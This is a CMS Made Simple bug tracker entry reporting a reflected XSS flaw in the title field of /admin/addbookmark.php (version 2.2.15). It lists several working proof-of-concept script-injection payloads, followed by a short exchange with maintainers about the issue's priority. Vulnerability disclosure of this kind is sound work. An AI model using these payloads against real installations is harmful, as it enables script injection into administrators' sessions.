CMS MADE SIMPLE FORGE

CMS Made Simple Core

 
Back Back to List

[#12432] Reflected XSS in /admin/addbookmark.php

avatar
Created By: Humberto Junior (halencarjunior)
Date Submitted: Thu Mar 18 11:22:38 -0400 2021

Assigned To: CMS Made Simple Foundation (cmsmsfoundation)
Version: 2.2.15
CMSMS Version: 2.2.15
Severity: Minor
Resolution: Accepted
State: Open
Summary:
Reflected XSS in /admin/addbookmark.php
Detailed Description:
If you log in Admin panel and My Preferences you could be able to exploit XSS in
title field

Some payloads that works:

"><script>prompt(1)</script><"
"><script>alert(1)</script><"
63311';alert(1)//812
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


History

Comments
avatar 
Date: 2021-03-18 12:08
Posted By: Matt Hornsby (DIGI3) (DIGI3)

Please see
https://www.cmsmadesimple.org/community/get-involved/report-a-vulnerability for
details regarding exploits requiring admin access
avatar 
Date: 2021-03-18 12:11
Posted By: Humberto Junior (halencarjunior)

This is still a vulnerability that could be exploited.

Just sanitize the field to be more secure.
avatar 
Date: 2021-03-18 12:16
Posted By: Humberto Junior (halencarjunior)

And it is not different from 

CVE-2019-17226
avatar 
Date: 2021-03-22 14:34
Posted By: Matt Hornsby (DIGI3) (DIGI3)

The link referenced mentions we do plan to clean this up as time permits, but it
isn't a high priority for the reasons outlined.
Updates

Updated: 2021-03-22 14:34
resolution_id: 8 => 6

Updated: 2021-03-22 12:07
severity_id: 2 => 3

Updated: 2021-03-19 07:59
severity_id: 12 => 2

Updated: 2021-03-19 07:59
resolution_id: 9 => 8

Updated: 2021-03-18 12:08
resolution_id: => 9
severity_id: 2 => 12